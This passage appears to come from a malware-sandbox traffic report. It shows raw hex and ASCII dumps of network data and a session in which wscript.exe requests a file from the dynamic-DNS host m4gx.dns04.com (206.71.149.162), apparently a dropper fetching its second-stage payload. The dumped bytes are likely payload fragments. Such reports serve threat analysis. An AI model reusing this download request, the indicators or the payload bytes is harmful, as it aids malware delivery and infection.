                                                                                                    2023-10-24 04:55:22 UTC4246INData Raw: 91 d6 09 50 59 e1 58 ca 5d 04 a4 de 4a 59 6c 90 2e 15 94 60 c6 bd f2 ae 66 a9 e5 0d 3c 83 3a e5 dc 62 d2 0a d6 b6 e6 eb 1b 5e d9 0d 38 e4 35 6f c9 64 31 47 17 dc 0a e7 47 55 0b e3 65 61 23 d6 0e d3 fc 5f b2 da 9e 25 f9 26 45 b6 6f 10 f4 08 e6 7b 10 06 22 6b 94 bc b7 66 9b c4 a2 08 c4 c5 43 7e c0 e2 79 b8 d9 df 6d 73 2b 7f 26 44 4b 5d f2 45 7a dc 58 51 a9 0a 2e 19 fb 98 3c 5b 27 48 1e bb c1 42 4a f5 7d 0d 38 e9 92 c4 e8 ee 3f 6f 5e 53 83 a9 87 1f fb 2f cc 3e 31 cd 31 2b 60 56 bd f3 d8 df 34 eb 17 ac bb bb c7 93 ec ea 37 af 34 23 92 b4 e3 0f 46 78 1c f9 df 7f 19 cf 4e 1e 1d 76 81 ee 4e 3b 00 bc 3e 0e 9b d2 27 0b de 08 95 16 6a ea 8e 09 71 57 d1 22 18 91 e7 41 bb 2d 92 9a 18 b8 35 3b 8d bf 49 83 4a 45 9d 9d 12 e3 da 98 b0 8a e7 7e 77 94 34 7e 9d 40 5f a7 af
                                                                                                    Data Ascii: PYX]JYl.`f<:b^85od1GGUea#_%&Eo{"kfC~yms+&DK]EzXQ.<['HBJ}8?o^S/>11+`V474#FxNvN;>'jqW"A-5;IJE~w4~@_
                                                                                                    2023-10-24 04:55:22 UTC4254INData Raw: 10 bf c0 9b c6 bf d5 f2 b3 ea 2d 20 39 36 a3 63 6c d6 2c 63 9c 83 aa ec 6d ea dd 52 69 68 f3 88 2b 07 fe d0 23 25 52 3d f3 43 8b 64 41 37 b8 84 b9 75 f0 67 a8 28 62 88 d2 b4 ef 3f 7a df ff 61 70 df 73 2e 02 3e e7 34 f6 b8 1e 6f 1e a8 6e 52 3a c8 03 44 a8 1f 07 eb 9e fc 91 11 1e 70 86 a5 ad fb 76 cd ee 63 12 fb 58 c3 10 68 79 e3 15 07 fa 6f df 34 4c 93 c6 c9 f4 c7 9e ad 63 e4 1d dd 69 b3 20 24 88 df 3f f1 24 7f 1f 8c fd d6 4b 52 e7 dc 25 8c aa 39 0b fe 19 95 a1 4e 46 61 0c f6 59 27 7c 53 eb a4 96 76 51 bd 42 2a c2 19 4a d3 0e 22 70 61 c4 10 07 f4 b0 e0 b3 4a 1d 4f 2e be b3 a9 22 29 87 5c 28 d7 61 87 d1 84 cf 54 90 40 a2 da f4 13 1e dd 7e d0 71 fe 62 77 e6 b0 be a8 24 80 27 52 4f 59 3e 3d 9b c7 1b 00 ea da 86 1b ba 77 ed 11 a6 66 13 0c fb 16 c2 e9 d6 ca 8a
                                                                                                    Data Ascii: - 96cl,cmRih+#%R=CdA7ug(b?zaps.>4onR:DpvcXhyo4Lci $?$KR%9NFaY'|SvQB*J"paJO.")\(aT@~qbw$'ROY>=wf
                                                                                                    2023-10-24 04:55:22 UTC4262INData Raw: 23 54 d7 39 c1 51 9f 4a f1 8e 47 4e c5 90 19 15 ef b8 1f cc cd 28 e8 93 30 e0 80 6b 0f 33 f0 1c 24 92 ec 2d 9a 32 9c 97 a4 61 b4 b9 d9 e9 19 07 c2 93 3d 5c f9 25 2c c8 d8 f4 5f 9d f2 b9 66 2a ff db 53 d8 db 67 fd 6e 70 8f f1 fb a1 17 97 e8 37 68 2d 0c de 0a 5b a2 3b 3e ab 2d 98 8d 48 2c ff 3f 2c c6 84 fc 3c 4f e4 4f bb d3 e1 ee cf 9f a0 88 30 e2 e7 4f ce 6a b1 90 c0 55 df 1e 3b 0a e7 0f 03 de 67 70 66 07 97 e8 b2 6e e2 f3 5b a1 cf 6a 49 55 d3 ee f6 e4 04 03 77 43 6d 6b 8a 52 1a b0 60 bf 22 ec a7 3e 48 b3 4d 1a 8e ab 1b a2 8b e3 10 07 06 75 63 4d e6 06 6e 3d 2e d6 d7 51 a8 2f 39 de 69 3c 0d ad f6 77 6e 61 58 af 28 f3 d7 6a f8 04 ae b9 d1 d2 06 f3 46 ca e1 e8 47 a2 bc 23 6a 88 3a ae da 1e 3b 4c be df a7 06 e1 82 ec 6d d6 81 06 e3 50 9a 55 70 92 65 3f d2 6e
                                                                                                    Data Ascii: #T9QJGN(0k3$-2a=\%,_f*Sgnp7h-[;>-H,?,<OO0OjU;gpfn[jIUwCmkR`">HMucMn=.Q/9i<wnaX(jFG#j:;LmPUpe?n
                                                                                                    2023-10-24 04:55:22 UTC4270INData Raw: 9e 05 27 09 9e cf 9b f9 27 0c 46 d3 b4 77 70 df d3 9d 33 08 5e 4e f0 59 22 64 e3 14 d0 c5 1c 23 4c 83 1f 3c d7 dc 2f ce a3 3f d6 c2 f2 84 00 80 94 cd 80 94 22 86 70 b4 be 79 8e a2 18 42 8f b8 55 4c 65 0a e0 ab 50 c3 b8 68 12 7d ae 5d c6 20 49 99 b8 47 65 23 78 cb aa 0f ef 17 c0 3f 8d ec 2e 26 46 fd aa 03 23 78 62 cc f0 dc 79 f0 44 81 71 2c 39 f0 c7 9b 85 97 94 90 dc e0 cb a5 70 ad 1b 26 5d a3 70 42 6d 0d 66 37 2a c9 69 7d a0 2e ff 13 6d 22 7d 8e d7 28 fd 77 ed a5 2d 05 5f c6 c7 1b ec 2f f1 e8 3f de 2e df 9d f2 84 d0 3c ed 80 a5 cb 53 c0 14 c1 fe 09 a5 bc f2 21 31 5d 1c f1 51 ca 36 58 3d bf 1a 95 2f cb f5 c7 c2 a8 7a 5f 74 8c 01 74 ba 21 f2 60 12 a4 a5 02 e4 33 31 de ef d5 3a 74 6a e1 4a 26 c4 6d d3 77 61 f7 bf 1d f7 9a 4c 02 a8 51 3d 78 b0 8b 2f a5 f8 3a
                                                                                                    Data Ascii: ''Fwp3^NY"d#L</?"pyBULePh}] IGe#x?.&F#xbyDq,9p&]pBmf7*i}.m"}(w-_/?.<S!1]Q6X=/z_tt!`31:tjJ&mwaLQ=x/:
                                                                                                    2023-10-24 04:55:22 UTC4277INData Raw: 91 03 ca f9 8f 5e ef e5 2c 70 a8 2c ec 6a 6b cc 17 40 e0 fa a3 79 1d 39 0b 3e aa 37 66 85 72 f1 78 da 56 f4 e8 6c ce 23 65 00 35 c4 14 96 d2 2a a0 e2 11 98 61 2b e1 e3 bc 35 38 ad be eb ad 35 d7 41 63 d6 f4 42 ee 54 3c fb fe c4 11 5f 70 e4 e5 42 fe 45 b8 5a 8d c3 be 24 a7 18 c0 d7 c1 d2 05 cc e5 cc 7d ee 1c ef 8a f6 72 c2 e4 08 a7 70 ec e4 1e 0d cd f7 79 90 20 d3 0a 1c 11 6c 3b 15 6e 78 61 58 05 88 9c 0c 50 2e 8b 94 9d e4 80 66 4b 81 02 5d 6c ec 0b 5d 04 75 0b 9f 4e 31 05 52 37 45 db e7 14 d4 13 b6 cd 14 a3 0a 39 ed ea c4 6f 41 f4 d6 3c c2 23 1c 3d c6 9b 2c c5 83 84 27 fc f4 e2 cf 4e 7d 71 f3 9a 0a 7b b7 f8 55 cb 7d 59 e3 72 ae 72 d1 3c f6 4e 1b a9 f1 1b f5 25 a6 a7 f6 02 7f 20 47 0a e7 b1 48 e5 c3 34 97 27 78 37 cd c7 91 e2 0e 4b 05 3b e2 67 0f 9b c2 6e
                                                                                                    Data Ascii: ^,p,jk@y9>7frxVl#e5*a+585AcBT<_pBEZ$}rpy l;nxaXP.fK]l]uN1R7E9oA<#=,'N}q{U}Yrr<N% GH4'x7K;gn
                                                                                                    2023-10-24 04:55:22 UTC4285INData Raw: e3 c8 a9 18 d1 0c 89 48 d2 6f cc 62 d2 34 02 2d 01 76 fe bf f7 af 28 2f 00 28 fa 0b 0b 90 47 f8 d7 43 0c 0a 09 7f ce 74 0c 09 41 80 11 45 e9 91 3c 2b e1 83 24 64 52 d2 c5 a5 7c f0 58 fa 0d 11 99 43 c8 94 90 47 e4 06 66 65 79 64 11 32 70 58 72 1a 30 14 47 a2 82 41 32 d1 68 fa 5d 81 cb cc c8 96 92 27 bb 9f b1 fd 0f 47 a0 10 6c 64 66 1a 42 4a e6 97 ec f7 28 1a ed 49 20 e2 c9 12 d2 f4 9c 3c e3 45 24 11 fe d3 0b c8 fd ee 05 94 ff 3c 0a 01 06 41 20 1a 42 ae 00 20 10 04 3a 4b af 43 80 7f 91 89 fc 8b 0c f8 2f 32 d1 7f 91 81 fe 45 06 fe 17 19 84 2e 03 d1 65 c5 69 5a 74 99 2e 68 f8 25 98 8e 85 51 d4 8e de a5 45 0a 45 00 52 81 f1 a0 00 48 28 7d 14 00 8c 00 45 42 92 84 fc 00 a1 40 7f 50 14 e4 97 1f 53 90 c3 40 30 44 e8 d7 e3 16 bf 9e b9 80 fc f1 43 14 e4 05 f9 e3 25
                                                                                                    Data Ascii: Hob4-v(/(GCtAE<+$dR|XCGfeyd2pXr0GA2h]'GldfBJ(I <E$<A B :KC/2E.eiZt.h%QEERH(}EB@PS@0DC%


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    4192.168.2.449741206.71.149.162443C:\Windows\SysWOW64\wscript.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    2023-10-24 04:55:25 UTC4286OUTGET /v/lp1382.dfhyhgf HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Language: en-ch
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                    Host: m4gx.dns04.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2023-10-24 04:55:26 UTC4287INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 24 Oct 2023 04:55:25 GMT
                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                    Last-Modified: Tue, 29 Aug 2023 16:25:52 GMT
                                                                                                    ETag: "416d2-6041243baa797"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 267986
                                                                                                    Connection: close
                                                                                                    2023-10-24 04:55:26 UTC4287INData Raw: 27 77 73 2c 2e 3f 2c 2d 36 37 30 93 8e 46 81 50 2f 01 cd 96 46 2b 28 3b 40 2f 2c 31 2e 2f 30 93 98 5a 5e 2b 46 6d 13 ee d3 6f 73 e7 c2 97 76 d6 c7 7b 83 31 ae ff 72 a8 6d 82 61 50 75 68 58 5f 77 d3 2b a0 52 d6 6c 1d a2 3b 1b 92 d8 ee c1 16 9b 6a f2 7b d0 d8 2c 2d 0f ea 6a 48 cd 52 0d 17 13 38 c6 5d 70 e4 09 c3 08 ab 72 de cb 9a 6b 48 fc da 00 a0 66 f5 6b f5 00 5a 1f 3d d9 f6 43 cf c2 30 bd 3a b0 27 8e c0 8d 14 e4 7c 4a 1f 28 29 37 00 19 f1 59 4e c7 74 46 40 af 71 e0 93 e0 a0 2e e2 7a 55 58 b1 89 d6 6c 6d f3 99 ab 97 a1 23 95 6d 49 d9 ea 56 61 0c c7 35 fc a4 1c 65 39 0d 63 c8 f0 4f 90 9f bd 39 a9 76 aa 97 02 d2 39 3f 0c e4 5d 24 ea 43 2c 12 9d 75 e6 10 7f 18 be b9 39 05 1e 6c 6e c5 dc 24 44 75 fe 64 4e 33 d0 c3 8d 8e bc b1 eb 2f a4 d1 aa 8e 02 58 76 51 3d
                                                                                                    Data Ascii: 'ws,.?,-670FP/F+(;@/,1./0Z^+Fmosv{1rmaPuhX_w+Rl;j{,-jHR8]prkHfkZ=C0:'|J()7YNtF@q.zUXlm#mIVa5e9cO9v9?]$C,u9ln$DudN3/XvQ=
                                                                                                    2023-10-24 04:55:26 UTC4295INData Raw: ee 9d fd 73 49 63 1a eb 9a 1c 6b ae 12 70 1f e3 b3 9d 37 9f 38 09 95 e5 e6 5e 19 6d ef df 94 75 4e ca 12 dc 75 a3 22 69 c0 1c 48 e9 7a 98 33 e4 a5 dd 48 2e 42 1e b6 33 84 69 29 f9 98 31 94 5f c6 ef 55 cd 7f fd 64 f0 e1 01 5a 32 9f f8 a1 f2 f3 10 37 76 a8 37 7d 11 d6 7d 32 32 e2 13 58 ef d3 e5 ff bf eb 34 67 2a 44 fe 29 ca 79 60 2c b3 f3 64 a5 c0 6c 88 b6 28 8f 25 b0 85 a7 10 c6 70 25 04 26 e5 23 0e 3a 62 6c f4 78 f8 7f d4 52 4a bd ae 5a f9 f9 16 f9 29 65 97 24 ff 09 d4 98 79 6e 42 bf da 89 1d 3d c0 48 2a b1 4e e7 02 fb 22 f0 22 5f be a7 1c ec 3e 0e 89 5c 41 ce 8d d8 da 41 f0 8b d7 43 25 6c f2 e0 16 7f f0 40 08 7b ef 83 aa fb ae b0 3c 17 6f c7 84 74 46 8d a8 0c ce c5 8a d7 e6 da 10 bc ce f3 03 d9 4b 93 39 f8 bd 13 4b 18 c2 8c 4a 22 95 a8 af 12 a4 b0 11 de
                                                                                                    Data Ascii: sIckp78^muNu"iHz3H.B3i)1_UdZ27v7}}22X4g*D)y`,dl(%p%&#:blxRJZ)e$ynB=H*N""_>\AAC%l@{<otFK9KJ"
                                                                                                    2023-10-24 04:55:26 UTC4303INData Raw: a9 eb 4d 2e d5 ca a2 34 39 3f 16 38 be 91 b1 de 23 7b 2e 53 97 74 a1 8c c9 55 9a 58 84 77 e7 2b 68 d9 9f e1 13 a4 dc be 04 ec b1 c4 89 09 c0 5a 58 9c 15 29 ca 37 99 5b 45 20 54 a6 a4 14 2a e3 4b 0c c8 83 3e 3a 96 bf e6 7b a6 ca a9 80 13 c2 01 03 a6 25 69 13 a2 70 87 16 10 9d 41 59 eb 94 66 43 ba d2 a6 ad ad 9a 2e ee 85 1e ec 5d bb 2d 3e fe d4 e5 49 67 50 78 8c c9 5b eb fd 8a 06 01 1b 40 cd fe e0 df 5f f4 0b c6 06 94 d4 e9 39 bd f6 23 70 f4 9a 39 08 f7 ed fe 91 cc 08 09 5e 47 50 c0 0a 8e 69 2f 33 3d 37 5e bc 7c 31 93 bf 98 e7 12 aa ac 78 24 07 62 2f f6 a0 5d 33 54 85 5f 86 06 38 78 09 63 f8 f8 31 dc 5f a3 dd c9 08 b4 ae 85 e8 35 55 fc 8f 1e f4 cf 17 be 13 d5 45 c6 8e ab cb 82 82 13 5d a5 1c af 65 46 f4 45 be 6a 6f fd a1 e2 ea c5 11 9e a5 99 e7 8f d4 04 19
                                                                                                    Data Ascii: M.49?8#{.StUXw+hZX)7[E T*K>:{%ipAYfC.]->IgPx[@_9#p9^GPi/3=7^|1x$b/]3T_8xc1_5UE]eFEjo
                                                                                                    2023-10-24 04:55:26 UTC4310INData Raw: b5 a2 44 20 d5 4d c1 70 f1 cc 6d 97 53 4d 8a 91 76 13 11 40 39 ed 56 51 84 db 3b 0f 93 8c 0a b1 4f f2 89 aa 49 46 63 58 ae 9f f8 cb 8b 37 01 39 5e 92 a5 c3 dc dd 2c e8 02 cf 35 69 12 c2 8d d5 4f d8 92 2c e3 d2 0a 43 49 06 72 93 bb aa e3 1f e4 b8 6a ba d2 af 86 b8 7b a2 ed da 21 ae 85 5d 0d 09 1c 4b 67 8a a7 3a 4f 73 a2 7d b2 4b 90 c3 df cb 15 35 e3 36 91 bf 4c a6 2c 23 58 2d d4 eb 59 e3 31 e9 8c 60 19 df c9 20 c5 94 aa 8b 0d 61 57 dc 80 f1 68 e3 b9 f6 34 8b c6 b6 31 9e 02 26 ff 11 10 c8 f0 a4 44 24 e1 36 66 70 91 ab b1 3e b1 82 00 83 ae a9 e8 be 2e 83 02 8e ff 53 54 56 72 7c 1d 1d 3b 35 ba 8e 7b a8 39 87 60 3d 3b 8d 71 b4 a9 81 08 e1 fc af 89 67 81 b5 2c 43 ea 71 e0 d6 76 c1 e7 21 44 24 b6 de 32 53 87 f7 c2 ca f3 3f e8 c9 98 e4 ec d5 de d5 a8 9b c3 61 4c
                                                                                                    Data Ascii: D MpmSMv@9VQ;OIFcX79^,5iO,CIrj{!]Kg:Os}K56L,#X-Y1` aWh41&D$6fp>.STVr|;5{9`=;qg,Cqv!D$2S?aL
                                                                                                    2023-10-24 04:55:27 UTC4318INData Raw: fd cc c8 04 fd c5 ae 84 83 15 2e 03 b9 28 f7 1b 79 0c f0 3a 9d 08 06 74 f9 dd d1 03 3a 62 84 f5 f8 f2 d2 86 6b 02 ce 77 0e d6 b9 9d d6 f9 76 64 8c 90 6c 70 2e 76 b4 0b 75 4c e3 1a 79 31 9d ec 91 b8 36 14 b4 6c 77 44 13 09 7e 5c 40 0a 04 0c ab 64 c4 2c 23 2d 2b 9e f4 21 d1 ad 10 ec bb 9c 49 98 7b 94 61 1c f2 e8 a0 1a 6c c2 a8 69 b5 fc 99 75 bc 5f 65 d2 4b 86 64 78 f8 29 4b f8 ba ed 67 49 22 5d bd 5a 40 37 6d 73 a7 f2 21 80 0d a7 50 13 91 06 a6 f6 5d c1 08 8b a5 9d d1 2f 1b ed de f5 37 b9 a8 c4 95 77 41 a7 05 63 ec 3c f3 33 ca a6 b5 05 f8 e3 5f 55 84 56 f9 6b 12 df 51 6f 09 af fe e4 c7 03 93 f4 6b e8 c5 f8 bf 08 f7 06 f6 90 7a 58 aa f9 ac db cf 7a 91 5c 37 34 5b a5 e7 96 7d 18 fa 30 5c 09 d4 82 61 7e 5e 8d 2d 6c 09 fe a4 65 da 25 ed 9b 72 aa 10 56 4c b1 c3
                                                                                                    Data Ascii: .(y:t:bkwvdlp.vuLy16lwD~\@d,#-+!I{aliu_eKdx)KgI"]Z@7ms!P]/7wAc<3_UVkQokzXz\74[}0\a~^-le%rVL
                                                                                                    2023-10-24 04:55:27 UTC4326INData Raw: 60 57 cf d0 09 4a a0 49 9e 16 6e 7c 10 9b 84 30 29 52 3e 31 a9 84 dd 05 00 58 2d 42 b0 5a 39 55 7d cb aa 5c cd 04 ee 68 ae 82 87 97 dc a1 2c a3 6d aa bf b6 a7 e5 55 d5 a9 59 01 91 52 27 3a e4 b2 eb e2 fa 18 d6 10 be 2a 04 c5 2a f1 51 ba 14 f7 43 05 31 b3 55 9e 83 1e 9b 3b 20 a9 36 46 74 cf 8a 7e ca 23 fa 8b 93 9c a6 c9 3b 76 ba d1 9c b1 3f 5f 21 87 f0 0b ec c6 98 03 b0 b1 b9 92 ee ce 73 f0 24 70 60 68 fe 5d 06 ea 3c 0f ca ef 5f e5 06 7f ff 83 0e 6e ca 8b 66 55 f2 5c 88 69 4c 75 9c 4c 14 a2 01 f6 ba d5 80 8f be 10 7e 7e 10 0e 78 e6 87 d0 91 29 b4 34 66 68 50 be 95 12 6a be bb 2d f5 a3 2e 88 bd 38 75 df d4 02 03 80 1d ba 20 a8 78 d5 4f b1 77 2e 5a f9 76 73 53 8d 0a 5d 58 aa 5c d5 c1 39 f6 0b 17 be 9d d7 57 da 3b c4 36 2f 4c 4d 20 bb 65 00 3e ab 74 2b 3c 40
                                                                                                    Data Ascii: `WJIn|0)R>1X-BZ9U}\h,mUYR':**QC1U; 6Ft~#;v?_!s$p`h]<_nfU\iLuL~~x)4fhPj-.8u xOw.ZvsS]X\9W;6/LM e>t+<@
                                                                                                    2023-10-24 04:55:27 UTC4334INData Raw: 62 59 03 5b 5d 0f f9 7b 82 9b 7e 23 e9 80 53 92 8d 49 b1 a6 d4 0f d9 d0 7a 3f db c2 b2 82 1a 20 4a 26 de e1 81 37 aa b1 32 4b b1 b7 1a 29 e2 1b 77 8c f2 0d d0 28 94 c7 1c 3c ec a6 da 8a 67 fc 47 ab 01 5a 04 2b 51 37 a9 7d a0 2b 95 03 e3 f3 8e 71 fd 1c 69 bd 44 3f 02 1d 71 a4 fc 3a c6 9b 67 21 da ab 63 76 4e 40 20 86 96 6f b0 20 11 56 02 6c 52 98 ab e7 89 99 1e 1f 63 b0 22 1f 97 68 7c a6 19 ec 7a 64 84 9f 00 7a 24 70 fd 78 80 7f 82 45 32 56 2b 46 e5 eb 58 ca bc e9 f9 83 4a 59 64 db 77 59 5d 22 59 7e 48 b4 80 54 f4 b1 5d 0d f3 44 b3 be a2 ee 8c 21 26 dc a7 ba 46 1c 33 fe 30 e1 b8 0a 9b ff 69 15 3b c6 f8 29 0c 35 8a 33 88 08 e5 de 2b e0 6f 84 ad d3 db ee da fc db bd d9 cf 9f 2c 52 cb 0d 3a 35 58 09 a4 4b ea 06 29 f0 87 07 11 a0 2b e5 45 13 72 79 b3 50 32 c5
                                                                                                    Data Ascii: bY[]{~#SIz? J&72K)w(<gGZ+Q7}+qiD?q:g!cvN@ o VlRc"h|zdz$pxE2V+FXJYdwY]"Y~HT]D!&F30i;)53+o,R:5XK)+EryP2
                                                                                                    2023-10-24 04:55:27 UTC4342INData Raw: 17 1c 44 86 0f 3a b5 33 44 19 18 6e df f6 7d c8 ac e2 00 d1 35 44 9b c6 8c d7 4f 4b fb 1b 6e 93 56 35 7d 73 5f b0 10 0d 76 dc 17 56 e3 8e 68 9c 28 81 cf 93 8f 79 b1 31 b0 c3 c8 d9 e0 da 49 63 80 79 ef b0 cc 34 42 26 66 ef 37 2a 1a f6 09 95 2b 47 90 94 75 8e 8a 82 d1 3b ad 5e 5b ff dd 26 58 f4 2e 05 29 3b e0 e8 ab 6e f5 63 1a cc 5a ba a0 a1 ba 96 6a 8a 34 06 67 2b 9a 80 07 42 0a d6 5a 7e 3b 2e f9 c1 80 1b 31 41 79 aa 93 88 a4 2c e2 0a 48 e6 60 97 f4 cf 01 fb 16 40 18 16 26 0f e3 37 4c e3 c8 03 cb 5e 31 09 67 d8 32 20 02 84 c8 b8 e6 02 94 ec 2a ba fc 1e 51 4f 04 14 16 52 31 b3 07 f3 8d 27 0a 72 87 e6 58 75 bf 16 bb 32 98 6c 53 02 c6 81 50 0e 60 9c cc 40 b2 6e b3 cd f7 0e a9 aa 6b 0e c0 e2 f7 6f 80 39 32 58 7c a7 70 6c b9 58 91 8f 68 f5 41 56 26 36 04 eb 0c
                                                                                                    Data Ascii: D:3Dn}5DOKnV5}s_vVh(y1Icy4B&f7*+Gu;^[&X.);ncZj4g+BZ~;.1Ay,H`@&7L^1g2 *QOR1'rXu2lSP`@nko92X|plXhAV&6
                                                                                                    2023-10-24 04:55:27 UTC4349INData Raw: 91 68 cc 5e cf de d2 70 34 b0 93 7d 40 26 8e 84 5c 0e 61 4b be ed 8a 05 5b c2 28 d1 80 a5 0a ab 07 97 74 ff ec f1 f8 4c ef 1a a6 e3 50 e8 e6 7b d1 01 35 7e fe 39 43 25 ab 9d 23 4d c3 06 2e 2e 18 11 09 9c 6b 71 ef ea 45 14 3c 60 e8 72 93 93 e3 d7 41 58 b4 ff 95 09 52 01 11 4c af 43 0d 21 0f 57 73 1e 37 78 79 c5 35 87 22 d0 4c a5 29 bf 3e ae fd 44 e1 60 5f 0a ab 6d 71 c3 df db 78 40 56 06 14 92 73 c4 6f 17 8c 43 5f e2 88 0c 95 47 85 54 6e 3c 0b 46 b9 58 5c 8c 53 86 dd ff 8e 8f 7f 38 39 fb 47 eb 74 26 5e ed be 5c 70 cd fe 8d 7b 02 cf a6 5b 8d e5 40 52 d5 ec 6e 61 bb 8f 52 54 f4 89 38 ce 71 08 dd 07 dc bd 6f 7b d0 8d 21 45 52 80 d8 b9 f5 8f 59 7f f0 56 3d ed f4 63 55 7c 12 99 0d 16 0e 01 b2 5f e4 0c 26 95 05 73 70 2b cd 3f 52 3e ba 24 25 3b 48 2b 2c a8 4e 4b
                                                                                                    Data Ascii: h^p4}@&\aK[(tLP{5~9C%#M..kqE<`rAXRLC!Ws7xy5"L)>D`_mqx@VsoC_GTn<FX\S89Gt&^\p{[@RnaRT8qo{!ERYV=cU|_&sp+?R>$%;H+,NK
                                                                                                    2023-10-24 04:55:27 UTC4357INData Raw: 0e e5 d0 8c fd c7 be fa 37 64 12 9b 6f 16 51 ac 9b 2a 64 8f 42 3a 52 05 a5 a4 ae a8 56 a0 94 1a 28 92 9f 5e 30 91 c0 dc c7 a7 b7 79 3a 13 11 9c 14 73 5b d7 42 76 91 51 41 df ac 94 25 eb 6f 95 01 0a bc 9d ad 55 d9 30 56 aa 17 ae 36 9c 3f c8 64 11 42 83 a0 16 f0 b6 b6 60 02 61 80 cc 00 de 4a 19 a0 b1 a9 0d df d4 ac e9 02 49 db fb 0c 16 1b 8d 02 b3 8c cf 42 ef 1c 63 d0 d4 59 63 3b 6d 22 c1 20 93 20 77 71 f0 cd 28 af a2 3a 63 03 8a ae a9 37 06 81 01 f7 53 91 9d cb 3e 63 a7 e4 93 08 0b 08 67 11 24 b9 dd bb d1 f8 29 db a9 3d 95 91 40 ce fb ce f8 a1 e8 23 e1 a2 4e 21 16 9d 6f 29 74 7f 68 bd bd b2 8f 65 d6 16 59 ee 08 9b 43 a5 12 0e 83 c6 98 23 d4 02 e0 1d 9a 33 ac 60 57 3e 69 61 cb 22 d6 4a 57 f8 e2 9b bb 21 af 94 51 8d 81 d8 c5 bb 74 2a 64 b6 8c fd 7d 63 9f 36
                                                                                                    Data Ascii: 7doQ*dB:RV(^0y:s[BvQA%oU0V6?dB`aJIBcYc;m" wq(:c7S>cg$)=@#N!o)theYC#3`W>ia"JW!Qt*d}c6
                                                                                                    2023-10-24 04:55:27 UTC4365INData Raw: 1c e0 f9 79 86 69 9e aa bb d2 c3 d5 25 6c c0 a6 f0 37 8a 2b 96 22 13 72 3e 24 c6 4d cd 95 61 78 cc 9f 96 b2 01 3e 4d dc e1 81 af e2 14 39 bd 46 89 74 48 f8 76 29 07 36 26 da f5 10 a9 74 87 a1 92 dc 18 12 2c 4b ca 2c cd 76 ee d3 38 a8 ac da 99 13 f4 6e df ca 39 e7 26 38 8c da 0c 30 bd 28 ed 9f d3 5e b7 83 15 20 4a 1d a9 3e c0 28 9e 5d d2 cf b9 93 8a d3 2e 6a 76 ae bd 42 f0 38 08 92 b6 11 70 04 5b e0 01 56 eb 23 08 92 4c 2b 90 4c 2f 21 13 24 fd ac f5 05 d0 4f 21 3e c1 82 e2 97 66 73 f6 ac fe c3 a2 f9 3d 64 0b 3a 16 b2 27 8e 1a 50 7f 06 24 01 08 03 c4 f4 e5 c4 3b ea 61 79 05 c6 fb 28 d4 b4 13 37 4d 13 a3 bf 29 a2 8f df d8 b4 d8 d9 34 ae 72 99 ee 2d 97 67 5e 06 7f 56 03 ed 61 29 b0 36 8c 0d 6f 9f af 65 31 17 62 e1 97 c8 ba ea 4c 11 e1 7d bb 91 0c 8e 9a 29 a5
                                                                                                    Data Ascii: yi%l7+"r>$Max>M9FtHv)6&t,K,v8n9&80(^ J>(].jvB8p[V#L+L/!$O!>fs=d:'P$;ay(7M)4r-g^Va)6oe1bL})
                                                                                                    2023-10-24 04:55:28 UTC4373INData Raw: 3a 74 d7 05 aa 4d 1f c7 94 6d 4f 9f 16 a9 65 69 56 4b fc a0 d0 de b6 d0 43 2f f6 05 42 8f 19 1b a4 79 15 23 ad d1 dc 75 3e ca 65 99 be 01 b5 3a 2f 74 15 39 52 f8 ea 7b 93 21 43 d7 69 5b 5b 49 e9 43 13 28 ac 3a 5c 03 31 6d cb 71 87 7c 82 a8 bd e5 9f 9b 70 a4 40 f6 6b 43 58 92 af 86 19 bd 96 d8 0a 64 d5 fc 30 6c a8 4b 6f ee c8 c1 7f cf c2 25 b5 a4 da bf 34 cf 61 d2 9f 04 b1 5b 1f a5 11 df c5 e9 a8 c8 f1 eb 7e b2 e0 ba 3c 85 c7 e2 78 22 31 8b a3 f0 48 53 55 b0 a2 f3 3a 11 98 2a c9 09 e3 c5 a3 f0 9d e5 ab 73 f9 dc be 43 95 03 54 bc 3a 53 76 a1 9a 92 fc 15 f8 7b 19 9d cc 2b 84 81 10 68 90 c8 bc 70 9b 37 f3 e2 b8 9e 45 54 b2 22 35 75 55 17 64 aa af 28 9a 08 8c f9 0f 9a 55 bb 7a 9a d3 d3 a4 c1 5d 22 8e 86 12 c7 dc 04 cf 0e e4 93 02 28 17 f9 9c 62 8a 1a 53 05 d4
                                                                                                    Data Ascii: :tMmOeiVKC/By#u>e:/t9R{!Ci[[IC(:\1mq|p@kCXd0lKo%4a[~<x"1HSU:*sCT:Sv{+hp7ET"5uUd(Uz]"(bS
                                                                                                    2023-10-24 04:55:28 UTC4381INData Raw: ec c7 ec 19 93 bb d4 a4 1e ef 8b 5c d3 5f 44 78 8f f7 34 5a 52 78 44 48 06 93 90 e3 a8 8e cb 1b 21 99 3c 47 8c 8f f3 4a 01 3e 08 56 71 57 be ca eb b4 44 9a 43 07 ab e8 16 6d 16 af 85 0d e1 27 c7 63 c9 76 66 81 b6 63 2f 76 1f d5 d3 a9 9b 27 e5 71 3f b9 28 eb 31 cb 5a f7 68 5e ca ff 0f 8d d0 e6 c3 51 fd fa 7f dd ba 8e 16 f2 c8 9e 2f 94 e2 2c e2 ba 70 db 91 58 09 21 84 a7 90 70 17 05 11 3d 3e ca dd 09 98 55 a1 2a 2b de 37 b6 3b af 0f f6 06 00 88 d8 39 de 9e b4 9e 9d 83 d3 4e 6b 0d aa 79 6a 36 49 6b af 1d b8 f4 65 41 40 59 b4 a0 06 a9 95 43 56 56 7d fe 64 2e 08 af e2 7e e6 cf 20 b3 ca 41 4e 18 b9 75 fd 40 7d 48 8c 8d 43 ed 09 af d4 ed 36 3a fd 15 51 89 bd 2f 20 7a d8 2d 5b b2 ef 81 c8 6a b3 1b 6b e8 70 08 7e 78 bd ff b9 f5 65 3c 02 f4 f8 6d 9d 92 34 a9 99 57
